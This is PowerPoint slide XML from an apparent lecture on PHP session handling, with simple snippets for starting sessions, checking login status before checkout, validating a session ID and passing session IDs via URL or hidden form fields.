                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1458468">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r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>//start session</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>   if (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>isValid</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> ($user, $</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>pwd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>)){</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>     </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$_SESSION['logged'] = 1;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> //store user status in session variable</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>     … </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">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4" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="2880692"/>
            <a:ext cx="7315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itchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Vrinda" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PHP code for establishing a session and tracking a user status</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="32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309293535"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="3436882"/>
          <a:ext cx="7391400" cy="2767584"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7391400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1517364">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;?</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>php</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>session_start</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>();</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>  if (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>isset</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>($_SESSION['logged']</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>)){</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>     </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>doCheckout</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> (); //valid session and user logged in, checkout allowed</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>  }  </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>  else{</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>     header("Location: http://www.xyz.com/login.php");// user not logged in</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>     exit;   </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>  }</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">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6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1042916" y="6204466"/>
            <a:ext cx="6858000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>PHP code for checking the validity of a functionality based on session</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3582900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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Checking the validity of cookie sent from the client side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="Table 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3419046262"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1219200" y="1099566"/>
          <a:ext cx="7238999" cy="3744468"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7238999">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="44736">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;?</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>php</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>session_start</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>();</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>   if (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$_GET['PHPSESSID'] == $_SESSION['PHPSESSID']</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>){</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>     if(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>isset</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>($_SESSION['logged'])){</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>       </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>doCheckout</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> (); //valid session, checkout is allowed</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  </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>   else{</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>     header("Location: http://www.xyz.com/login.php"); //invalid session</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>     exit;   </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>   }</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>?&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1421642" y="5093732"/>
            <a:ext cx="6934200" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Checking whether a cookie sent from the browser is valid at server side</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="589844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0"/>
            <a:ext cx="8534400" cy="723900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Session ID transfer from server side to client side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="Table 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1274977577"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1219200" y="2133600"/>
          <a:ext cx="6934200" cy="3101182"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1066937">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5867263">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="281926">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Type </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a:effectLst/>
                        </a:rPr>
                        <a:t>Example</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400">
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="281926">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>URL </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="240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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>href</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>= “http://www.xyz.com/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>test.php?</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>sid</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>=iek38i9d89</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>”&gt; … &lt;/a&gt;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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1409628">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Form parameter</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&lt;form type =”post”&gt;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   &lt;input type= “hidden” </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>name = “</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>sid</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>” value = “iek38i9d89”</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
